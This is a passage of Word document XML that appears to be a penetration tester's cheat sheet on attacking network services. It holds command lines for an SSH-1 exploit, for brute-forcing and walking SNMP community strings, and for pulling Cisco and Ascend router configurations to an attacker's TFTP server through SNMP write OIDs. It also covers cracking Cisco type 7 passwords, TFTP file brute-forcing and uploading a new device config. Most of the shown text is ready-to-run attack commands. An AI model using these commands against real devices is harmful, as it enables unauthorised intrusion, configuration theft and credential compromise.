          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="002B1290">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="002B1290">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>show targets</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D04166" w:rsidRPr="002B1290" w:rsidRDefault="00D04166" w:rsidP="002B1290">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B1290">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>./cm-ssh/shack –t10 &lt;ip&gt; 22</w:t>
      </w:r>
      <w:r w:rsidRPr="002B1290">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
        <w:t>exploit IP that has target 10</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D04166" w:rsidRDefault="00D04166" w:rsidP="00C21C9C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D04166" w:rsidRDefault="002B1290" w:rsidP="00C21C9C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B1290">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SSH-1 has inherent design flaws which make it vulnerable (e.g., man-in-the-middle attacks)</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="002B1290">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="002B1290">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> it is now generally considered obsolete and should be avoided by explicitl</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">y disabling fallback to SSH-1. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B50C46" w:rsidRDefault="00B50C46" w:rsidP="00B50C46">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:ind w:left="720" w:hanging="720"/>
      </w:pPr>
      <w:r w:rsidRPr="00B50C46">
        <w:t>•</w:t>
      </w:r>
      <w:r w:rsidRPr="00B50C46">
        <w:tab/>
        <w:t>SNMP (covering network information enumeration and common attacks against Cisco configurations)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F25286" w:rsidRPr="00595341" w:rsidRDefault="00F25286" w:rsidP="00F25286">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00595341">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Default snmp community strings (public, private)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00595341" w:rsidRPr="00595341" w:rsidRDefault="00595341" w:rsidP="00F25286">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F25286" w:rsidRPr="00595341" w:rsidRDefault="00F25286" w:rsidP="00F25286">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00595341">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Clear text protocol so community string can be easily sniffed from the network</w:t>
      </w:r>
      <w:r w:rsidR="00A55DF7">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> (wireshark, or </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00A55DF7">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>cain</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00A55DF7">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00595341" w:rsidRPr="00595341" w:rsidRDefault="00595341" w:rsidP="00F25286">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F25286" w:rsidRPr="00595341" w:rsidRDefault="00F25286" w:rsidP="00F25286">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00595341">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Brute force snmp community strings:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00595341" w:rsidRDefault="00F25286" w:rsidP="00956636">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w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00595341">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>ADMsnmp 192.168.0.1 –wordfile snmp.passwd</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00324A80" w:rsidRPr="00956636" w:rsidRDefault="00324A80" w:rsidP="0095663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onesixtyone</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> –c dict.txr &lt;ip address&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
        <w:t>(use –i for host file)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A55DF7" w:rsidRDefault="00A55DF7" w:rsidP="00F25286">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F25286" w:rsidRPr="00595341" w:rsidRDefault="00F25286" w:rsidP="00F25286">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00595341">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Information enumeration:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F25286" w:rsidRDefault="00324A80" w:rsidP="00F2528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snmpwalk</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> –</w:t>
      </w:r>
      <w:r w:rsidR="00A3420E">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>c &lt;string&gt; -Cc –v1 &lt;target&gt;</w:t>
      </w:r>
      <w:r w:rsidR="00F25286" w:rsidRPr="00595341">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> .</w:t>
      </w:r>
      <w:r w:rsidR="00A3420E">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00A3420E">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00A3420E">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>all</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w:rsidR="00A3420E" w:rsidRPr="00595341" w:rsidRDefault="00A3420E" w:rsidP="00F2528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-Cr –v1 &lt;target&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
        <w:t>routing table</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A3420E" w:rsidRPr="00595341" w:rsidRDefault="00A3420E" w:rsidP="00A3420E">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-Ci –v1 &lt;target&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A3420E" w:rsidRPr="00595341" w:rsidRDefault="00A3420E" w:rsidP="00A3420E">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–v1 &lt;target&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A55DF7" w:rsidRDefault="00B017F5" w:rsidP="00F25286">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snmpcheck.pl –t &lt;target&gt; -w –c public</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">nice output + checks write </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F25286" w:rsidRPr="00595341" w:rsidRDefault="00F25286" w:rsidP="00F25286">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00595341">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>getif.exe</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F25286" w:rsidRPr="00595341" w:rsidRDefault="00F25286" w:rsidP="00F25286">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F25286" w:rsidRPr="00595341" w:rsidRDefault="00F25286" w:rsidP="00F25286">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00595341">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Cisco snmp ‘write’ community string TFTP config retrieval</w:t>
      </w:r>
      <w:r w:rsidR="00595341" w:rsidRPr="00595341">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> (need TFTP server listening)</w:t>
      </w:r>
      <w:r w:rsidRPr="00595341">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F25286" w:rsidRPr="00595341" w:rsidRDefault="00F25286"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.1.3.6.1.4.1.9.2.1.55.192.168.1.15 s "config" </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00595341" w:rsidRPr="00B017F5" w:rsidRDefault="009D5F99" w:rsidP="00B017F5">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00B017F5">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>cain.exe</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B017F5">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B017F5">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00B017F5">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00B017F5" w:rsidRPr="00B017F5">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00B017F5" w:rsidRPr="00B017F5">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00AA703A">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00B017F5">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">does this without need for tftp server </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AA703A" w:rsidRPr="00AA703A" w:rsidRDefault="00AA703A" w:rsidP="00AA703A">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00AA703A">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>cisco-torch.pl</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00AA703A">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> -ugb &lt;target&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA703A">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00AA703A">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
        <w:t>requires TFTP server</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AA703A" w:rsidRPr="00595341" w:rsidRDefault="00AA703A" w:rsidP="00F25286">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00595341" w:rsidRPr="00595341" w:rsidRDefault="00595341" w:rsidP="00F25286">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00595341">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Assend snmp ‘write’ community string TFTP config retrieval (need TFTP server listening):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00595341" w:rsidRPr="00595341" w:rsidRDefault="00595341"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.1.3.6.1.4.1.529.9.5.3.0 a “192.168.1.15” </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00595341" w:rsidRPr="00595341" w:rsidRDefault="00595341"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.1.3.6.1.4.1.529.9.5.4.0 s "config" </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00595341" w:rsidRDefault="00595341" w:rsidP="00F25286">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AA703A" w:rsidRDefault="00AA703A" w:rsidP="00F25286">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>With config you can crack Cisco type7 passwords:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AA703A" w:rsidRPr="00AA703A" w:rsidRDefault="00AA703A" w:rsidP="00AA703A">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00AA703A">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>cain</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w:rsidR="00AA703A" w:rsidRDefault="00AA703A" w:rsidP="00F25286">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AA703A" w:rsidRDefault="00AA703A" w:rsidP="00F25286">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002B1290" w:rsidRPr="00595341" w:rsidRDefault="002B1290" w:rsidP="00F25286">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Windows SNMP MiBs contain usernames that can be used to attempt password guessing/bruteforce attacks.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B50C46" w:rsidRDefault="00B50C46" w:rsidP="00B50C46">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r w:rsidRPr="00B50C46">
        <w:t>•</w:t>
      </w:r>
      <w:r w:rsidRPr="00B50C46">
        <w:tab/>
        <w:t>TFTP</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C14E10" w:rsidRPr="000B16F7" w:rsidRDefault="00C14E10" w:rsidP="00C14E10">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000B16F7">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>No authentication so file retrieval is possible if the file name is known.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C14E10" w:rsidRPr="000B16F7" w:rsidRDefault="00C14E10" w:rsidP="00C14E10">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="000B16F7" w:rsidRPr="000B16F7" w:rsidRDefault="000B16F7" w:rsidP="00C14E10">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000B16F7">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Cisco (or other) device configuration file retrieval:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002B1290" w:rsidRPr="000B16F7" w:rsidRDefault="000B16F7" w:rsidP="000B16F7">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="000B16F7">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>tftp</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="000B16F7">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> -i &lt;ip&gt; GET config.cfg config.cfg</w:t>
      </w:r>
      <w:r w:rsidRPr="000B16F7">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="000B16F7">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">windows client config = hostname </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000B16F7" w:rsidRPr="000B16F7" w:rsidRDefault="000B16F7" w:rsidP="000B16F7">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="000B16F7" w:rsidRPr="000B16F7" w:rsidRDefault="000B16F7" w:rsidP="000B16F7">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="000B16F7">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>tftp</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>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t>linux client</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connect &lt;ip&gt;</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get config.cfg</w:t>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t>config = hostname</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quit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00324A80" w:rsidRDefault="00324A80" w:rsidP="00C14E10">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00A236AF" w:rsidRDefault="00A236AF" w:rsidP="00C14E10">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>TFTP bruteforce:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A236AF" w:rsidRPr="00A236AF" w:rsidRDefault="00A236AF" w:rsidP="00A236AF">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A236AF">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
        </w:rPr>
        <w:t>tftpbrute.pl &lt;target&gt; brutefile.txt</w:t>
      </w:r>
      <w:r w:rsidRPr="00A236AF">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A236AF" w:rsidRPr="000B16F7" w:rsidRDefault="00A236AF" w:rsidP="00C14E10">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="000B16F7" w:rsidRPr="000B16F7" w:rsidRDefault="00A236AF" w:rsidP="00C14E10">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Also upload a new config through the SNMP write issue if you can’t get any passwords. Cain will do this for you.</w:t>
      </w:r>
    </w:p>
